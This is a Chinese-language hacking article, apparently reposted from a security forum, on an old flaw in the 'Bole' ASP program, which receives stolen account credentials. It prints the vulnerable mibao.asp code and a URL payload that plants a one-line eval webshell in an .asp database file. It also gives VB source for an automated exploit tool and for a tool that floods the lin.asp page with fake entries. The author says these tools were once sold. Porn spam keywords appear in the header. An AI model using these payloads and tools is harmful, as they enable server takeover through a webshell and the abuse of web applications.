欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

伯樂asp收信程序漏洞及利用程序利用代碼

 更新時(shí)間:2008年06月07日 22:16:02   作者:  
信息來源:邪惡八進(jìn)制信息安全團(tuán)隊(duì)(www.eviloctal.com) 文章作者:fhod 發(fā)這個(gè)也是因?yàn)榭戳薬sm所寫的新概念收信程序 箱子永遠(yuǎn)不會(huì)被黑
http://forum.eviloctal.com/thread-32151-1-1.html 
之后又有會(huì)員PM我..加上事過已久..也不是什么保密的東西了..網(wǎng)上也許到處都是了..就考慮把東西發(fā)出來..算是個(gè)學(xué)習(xí)吧.. 
伯樂的收信程序(針對(duì)以前的老版本.后來修補(bǔ)了這個(gè)漏洞) 
主數(shù)據(jù)庫名第一次使用設(shè)置時(shí)是隨機(jī)產(chǎn)生的..但因?yàn)樗峭ㄓ檬招懦绦?.可以截獲密保.. 
mibao.asp文件對(duì)提交的參數(shù)沒有任何過濾 
復(fù)制代碼 代碼如下:


if action="put" then  
sql="select * from mibao where u='"&request("u")&"'"  
set rs=Server.CreateObject("ADODB.RecordSet")  
rs.open sql,conn,1,3  
if rs.eof then  
rs.addnew  
rs("u")=request("u")  
rs("pos")=request("pos")  
rs("p")="等待破解"  
rs.update  
rs.close  

response.write "addok"  
else  
sql="update mibao set pos='"&request("pos")&"'"&" where u='"&request("u")&"'"  
conn.execute(sql)  
response.write "updateok"  
end if  
end if 

第一行代碼處 

ConnStr="Provider = Microsoft.Jet.OLEDB.4.0;Data Source =" & Server.MapPath("mibaoaa.asp")提交的數(shù)據(jù)插進(jìn)了mibaoaa.asp 
asp后綴的數(shù)據(jù)庫文件..未做防下載處理..提交一句話木馬..很容易得到webshell 

假設(shè)箱子地址是 
http://127.0.0.1/ 
就訪問 
http://127.0.0.1/mibao.asp?action=put&u=3&pos=3<%25eval request(%22%61%64%22) %25>&mb=3&p=3 

返回 "addok"就說明插馬成功 
接著 
http://127.0.0.1/mibaoaa.asp訪問小馬.. 
密碼是ad.上傳大馬拿到webshell 

根據(jù)此漏洞我用VB寫了一個(gè)簡(jiǎn)單的利用程序.. 
程序VB源碼

復(fù)制代碼 代碼如下:

Private Sub Command1_Click() 
Inet1.OpenURL (Text1.Text + "/mibao.asp?action=put&u=3&pos=3<%25eval request(%22%61%64%22) %25>&mb=3&p=3") '用inet連接網(wǎng)頁 
aa = InStr(Inet1.GetHeader, "404") '判斷頁頭是否包含字符“404”,返回0則不包含,否則返回其位置 
If aa <> 0 Then '頁頭中包含404 
MsgBox "木馬插入失??!", 48, "失??!" '則說明該網(wǎng)頁不存在 
Else '如果頁頭中不包含“404” 
MsgBox "木馬插入成功!", 64, "恭喜!" '說明網(wǎng)頁存在 
Command2.Enabled = True 
End If 
End Sub 

Private Sub Command2_Click() 
If Text2.Text = Text1.Text + "/mibaoaa.asp" Then 
MsgBox "已經(jīng)存在!請(qǐng)不要重復(fù)此操作!", 16, "error!" 
Else 
Text2.Text = Text1.Text + "/mibaoaa.asp" 
MsgBox "請(qǐng)使用一句話木馬客戶段連接!密碼ad!", 64, "成功!" 
Text2.Visible = True 
End If 
End Sub 

Private Sub Command3_Click() 
End 
End Sub 

程序和動(dòng)畫演示我也一并打包上傳了..教程因?yàn)槭侨ツ曜龅牧?.里面一些信息請(qǐng)各位兄弟看后不要再去嘗試了..
教程里所寫的聯(lián)系QQ也不要再去加了..那時(shí)候因?yàn)榛炜陲埑?.賣了幾個(gè)程序..

現(xiàn)在全部都公開了.. BOLE.RAR (2.5 MB)

另外看到貼中有人提到刷信問題..lin.asp也是沒怎么過濾的..可以外部提交數(shù)據(jù)

VB刷信代碼

復(fù)制代碼 代碼如下:

Private Sub Command1_Click() 
Inet1.OpenURL (Text1.Text + "/lin.asp?a=" + Text2.Text + "&s=" + Text3.Text + "&u=" + Text4.Text + "&p=" + Text5.Text + "&r=" + Text7.Text + "&l=" + Text8.Text + "&m=" + Text9.Text + "&pin=" + Text6.Text) '用inet連接網(wǎng)頁 
aa = InStr(Inet1.GetHeader, "404") '判斷頁頭是否包含字符“404”,返回0則不包含,否則返回其位置 
If aa <> 0 Then '頁頭中包含404 
MsgBox "刷信失?。∧J(rèn)收信頁面可能被改名!", 48, "失敗!" '則說明該網(wǎng)頁不存在 
Else '如果頁頭中不包含“404” 
MsgBox "刷信成功!請(qǐng)登陸后臺(tái)查看!", 64, "恭喜!" '說明網(wǎng)頁存在 
End If 
End Sub 

Private Sub Command2_Click() 
End 
End Sub

相關(guān)文章

最新評(píng)論